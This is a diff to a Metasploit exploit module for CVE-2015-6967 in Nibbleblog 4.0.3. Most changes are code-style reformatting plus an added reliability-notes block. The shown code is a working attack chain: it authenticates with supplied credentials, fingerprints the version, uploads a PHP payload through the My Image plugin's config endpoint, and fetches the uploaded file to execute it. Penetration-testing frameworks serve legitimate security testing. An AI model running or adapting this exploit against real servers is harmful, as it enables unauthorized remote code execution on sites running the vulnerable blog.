@@ -10,38 +10,44 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(
-      info,
-      'Name'            => 'Nibbleblog File Upload Vulnerability',
-      'Description'     => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Nibbleblog File Upload Vulnerability',
+        'Description' => %q{
           Nibbleblog contains a flaw that allows an authenticated remote
           attacker to execute arbitrary PHP code. This module was
           tested on version 4.0.3.
         },
-      'License'         => MSF_LICENSE,
-      'Author'          =>
-        [
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Unknown', # Vulnerability Disclosure - Curesec Research Team. Author's name?
           'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
         ],
-      'References'      =>
-        [
+        'References' => [
           ['CVE', '2015-6967'],
           ['URL', 'https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html']
         ],
-      'DisclosureDate'  => '2015-09-01',
-      'Platform'        => 'php',
-      'Arch'            => ARCH_PHP,
-      'Targets'         => [['Nibbleblog 4.0.3', {}]],
-      'DefaultTarget'   => 0
-    ))
+        'DisclosureDate' => '2015-09-01',
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Targets' => [['Nibbleblog 4.0.3', {}]],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
-        OptString.new('TARGETURI',  [true, 'The base path to the web application', '/']),
-        OptString.new('USERNAME',   [true, 'The username to authenticate with']),
-        OptString.new('PASSWORD',   [true, 'The password to authenticate with'])
-      ])
+        OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
+        OptString.new('USERNAME', [true, 'The username to authenticate with']),
+        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
+      ]
+    )
   end
 
   def username
@@ -57,25 +63,26 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Detected unless cookie
 
     res = send_request_cgi(
-      'method'      => 'GET',
-      'uri'         => normalize_uri(target_uri.path, 'admin.php'),
-      'cookie'      => cookie,
-      'vars_get'    => {
-        'controller'  => 'settings',
-        'action'      => 'general'
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'admin.php'),
+      'cookie' => cookie,
+      'vars_get' => {
+        'controller' => 'settings',
+        'action' => 'general'
       }
     )
 
     if res && res.code == 200 && res.body.include?('Nibbleblog 4.0.3 "Coffee"')
       return Exploit::CheckCode::Appears
     end
+
     Exploit::CheckCode::Safe
   end
 
   def do_login(user, pass)
     res = send_request_cgi(
-      'method'      => 'GET',
-      'uri'         => normalize_uri(target_uri.path, 'admin.php')
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'admin.php')
     )
 
     fail_with(Failure::Unreachable, 'No response received from the target.') unless res
@@ -83,16 +90,17 @@ class MetasploitModule < Msf::Exploit::Remote
     session_cookie = res.get_cookies
     vprint_status("Logging in...")
     res = send_request_cgi(
-      'method'      => 'POST',
-      'uri'         => normalize_uri(target_uri.path, 'admin.php'),
-      'cookie'      => session_cookie,
-      'vars_post'   => {
-        'username'  => user,
-        'password'  => pass
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin.php'),
+      'cookie' => session_cookie,
+      'vars_post' => {
+        'username' => user,
+        'password' => pass
       }
     )
 
     return session_cookie if res && res.code == 302 && res.headers['Location']
+
     nil
   end
 
@@ -125,21 +133,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vprint_status("Uploading payload...")
     res = send_request_cgi(
-      'method'        => 'POST',
-      'uri'           => normalize_uri(target_uri, 'admin.php'),
-      'vars_get'      => {
-        'controller'  => 'plugins',
-        'action'      => 'config',
-        'plugin'      => 'my_image'
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'admin.php'),
+      'vars_get' => {
+        'controller' => 'plugins',
+        'action' => 'config',
+        'plugin' => 'my_image'
       },
-      'ctype'         => "multipart/form-data; boundary=#{data.bound}",
-      'data'          => post_data,
-      'cookie'        => cookie
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => post_data,
+      'cookie' => cookie
     )
 
     if res && /Call to a member function getChild\(\) on a non\-object/ === res.body
       fail_with(Failure::Unknown, 'Unable to upload payload. Does the server have the My Image plugin installed?')
-    elsif res && !( res.body.include?('<b>Warning</b>') || res.body.include?('warn') )
+    elsif res && !(res.body.include?('<b>Warning</b>') || res.body.include?('warn'))
       fail_with(Failure::Unknown, 'Unable to upload payload.')
     end
 
@@ -152,8 +160,8 @@ class MetasploitModule < Msf::Exploit::Remote
     register_files_for_cleanup(php_fname)
     vprint_status("Executing the payload at #{payload_url}.")
     send_request_cgi(
-      'uri'     => payload_url,
-      'method'  => 'GET'
+      'uri' => payload_url,
+      'method' => 'GET'
     )
   end
 end
